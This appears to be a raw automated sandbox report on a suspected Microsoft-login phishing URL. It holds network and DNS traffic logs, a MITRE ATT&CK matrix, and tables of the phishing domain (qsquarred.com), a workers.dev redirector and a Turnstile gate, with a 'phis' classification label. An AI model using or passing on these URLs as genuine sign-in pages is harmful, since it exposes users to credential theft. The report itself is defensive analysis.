      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: qsquarred.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
      Source: global trafficDNS traffic detected: DNS query: portal.microsoftonline.com
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1667742497:1743089343:17-hpacoV-tmK98-x1_Lkc9_yh5xB5iV6dx5PGhM0sk/9270269dc843c451/SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKW HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3507sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKWcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 829Content-Type: text/htmlx-ms-error-code: WebContentNotFoundx-ms-request-id: 40d993a1-c01e-0001-7f32-9fdebb000000x-ms-version: 2018-03-28Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,x-ms-error-code,x-ms-request-id,x-ms-versionAccess-Control-Allow-Origin: *Date: Thu, 27 Mar 2025 16:09:35 GMTConnection: closeAkamai-GRN: 0.ef68c917.1743091775.31a8434Set-Cookie: ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; Domain=qsquarred.com; Path=/; Expires=Thu, 27 Mar 2025 18:09:35 GMT; Max-Age=7200; SameSite=None; SecureStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Security-Policy: default-src * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; frame-ancestors * http://* https://* file://* about: javascript: data: blob:; connect-src * data: blob: 'unsafe-inline'
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 829Content-Type: text/htmlx-ms-error-code: WebContentNotFoundx-ms-request-id: d5199a57-b01e-0000-7b32-9fca2c000000x-ms-version: 2018-03-28Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,x-ms-error-code,x-ms-request-id,x-ms-versionAccess-Control-Allow-Origin: *Date: Thu, 27 Mar 2025 16:09:36 GMTConnection: closeAkamai-GRN: 0.ef68c917.1743091776.31a884dStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Security-Policy: default-src * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; frame-ancestors * http://* https://* file://* about: javascript: data: blob:; connect-src * data: blob: 'unsafe-inline'
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cacheContent-Length: 1245Content-Type: text/htmlSet-Cookie: s.SessID=d6975d84-8b07-4412-a0dd-f0905cda6436; path=/; secure; HttpOnly; SameSite=NoneSet-Cookie: s.SessID=d6975d84-8b07-4412-a0dd-f0905cda6436; path=/; secure; HttpOnly; SameSite=NoneSet-Cookie: x-portal-routekey=eus; path=/; secure; HttpOnlyx-ms-correlation-id: 24dd1aa8-c08e-4659-b254-9bbee091798fX-Content-Type-Options: nosniffX-UA-Compatible: IE=EdgeX-Cache: CONFIG_NOCACHEX-MSEdge-Ref: Ref A: 0698E22B1CA24EC6BAB508088C0E9AA8 Ref B: BL2AA2030104047 Ref C: 2025-03-27T16:09:36ZDate: Thu, 27 Mar 2025 16:09:36 GMTConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 829Content-Type: text/htmlx-ms-error-code: WebContentNotFoundx-ms-request-id: e0c88c1f-801e-0088-0f32-9fb1c7000000x-ms-version: 2018-03-28Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,x-ms-error-code,x-ms-request-id,x-ms-versionAccess-Control-Allow-Origin: *Date: Thu, 27 Mar 2025 16:09:36 GMTConnection: closeAkamai-GRN: 0.ef68c917.1743091776.31a8a4bSet-Cookie: bm_sv=CD35904F15C7DF6C78BABD3EE1D73758~YAAQ72jJF/iyHtWVAQAANr1d2BsIqHEuRQYzWyjCLHE5fB6Ij9Vhfq+pFcRG59Ow4hmAsrV1HJuJyRMswBbKVjPOHuoyyljiZvNu6WuUofVN7xE7OhSsECY1vIciGUNOZJGEZm4yAuhzZaYPD9eu83HxmTBRMFz5SPGqUJZaUxiBdcV0LnTShnub6MpHruoRuNWYjMARnnp5zovdocYmMY0vYSCNJFgKg4D1XEXpKxeuTYIA0g0gxjX1zp7sYv63cFg=~1; Domain=qsquarred.com; Path=/; Expires=Thu, 27 Mar 2025 18:09:36 GMT; Max-Age=7200; SameSite=None; SecureStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Security-Policy: default-src * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline'; frame-ancestors * http://* https://* file://* about: javascript: data: blob:; connect-src * data: blob: 'unsafe-inline'
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownHTTPS traffic detected: 172.67.173.239:443 -> 192.168.2.16:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.173.239:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.16:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.30.213:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.72.100:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.86.84.2:443 -> 192.168.2.16:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.44.201.172:443 -> 192.168.2.16:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.86.84.2:443 -> 192.168.2.16:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.86.84.2:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1064_1872937132
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1064_1872937132
      Source: classification engineClassification label: mal60.phis.win@26/16@24/182
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,14553789535348024310,2542120593596377207,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,14553789535348024310,2542120593596377207,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Drive-by Compromise
      Windows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Extra Window Memory Injection
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDP0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1667742497:1743089343:17-hpacoV-tmK98-x1_Lkc9_yh5xB5iV6dx5PGhM0sk/9270269dc843c451/SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKW0%Avira URL Cloudsafe
      https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/favicon.ico0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9270269dc843c451&lang=auto0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9270269dc843c451/1743091753667/04912e90f56c6e1fcc6d0f75d35e8e0ec6fe019572ee4c4cb151a3402ea8ef5c/upl_LijoGNscKgt0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9270269dc843c451/1743091753670/NCiEr2lNZQ8amFY0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.js0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js0%Avira URL Cloudsafe
      https://qsquarred.com/index.html//?uuq_tgnqcf=vtwg0%Avira URL Cloudsafe
      https://qsquarred.com/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3FzcXVhcnJlZC5jb20vIiwiZG9tYWluIjoicXNxdWFycmVkLmNvbSIsImtleSI6IkZZa0o4RjRUVHJrVCIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDkxNzcyLCJleHAiOjE3NDMwOTE4OTJ9.LzstCOvhrXFSFTQ5K2KWyFNPTbA0byj9xF5xo8K4D6M0%Avira URL Cloudsafe
      https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      jsdelivr.map.fastly.net
      199.232.89.229
      truefalse
        high
        s-part-0012.t-0009.t-msedge.net
        13.107.246.40
        truefalse
          high
          e329293.dscd.akamaiedge.net
          23.209.72.9
          truefalse
            high
            248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev
            172.67.173.239
            truetrue
              unknown
              b-0004.b-dc-msedge.net
              13.107.9.156
              truefalse
                high
                challenges.cloudflare.com
                104.18.95.41
                truefalse
                  high
                  www.google.com
                  142.250.72.100
                  truefalse
                    high
                    a1894.dscb.akamai.net
                    23.44.201.172
                    truefalse
                      high
                      qsquarred.com
                      172.86.84.2
                      truetrue
                        unknown
                        cdn.jsdelivr.net
                        unknown
                        unknownfalse
                          high
                          identity.nel.measure.office.net
                          unknown
                          unknownfalse
                            high
                            portal.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9270269dc843c451&lang=autofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/favicon.icofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.jsfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+sanfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1667742497:1743089343:17-hpacoV-tmK98-x1_Lkc9_yh5xB5iV6dx5PGhM0sk/9270269dc843c451/SOMmslRSMlnGfD8DPHrCArl9xiFJZve8xZIKTYij1x0-1743091752-1.1.1.1-FxGa7NDI2E23fuLEL3d0SRzwvBoetLHWi9J3xF9XjGmTZ4N8xu70iEpyidAu9wKWfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.jsfalse
                                      high
                                      https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPtrue
                                        unknown
                                        https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.cssfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1y83y/0x4AAAAAABBPFnrHi5b1rkYo/auto/fbE/new/normal/auto/false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9270269dc843c451/1743091753667/04912e90f56c6e1fcc6d0f75d35e8e0ec6fe019572ee4c4cb151a3402ea8ef5c/upl_LijoGNscKgtfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9270269dc843c451/1743091753670/NCiEr2lNZQ8amFYfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svgfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svgfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                            high
                                            https://qsquarred.com/aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://qsquarred.com/aadcdn.msftauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
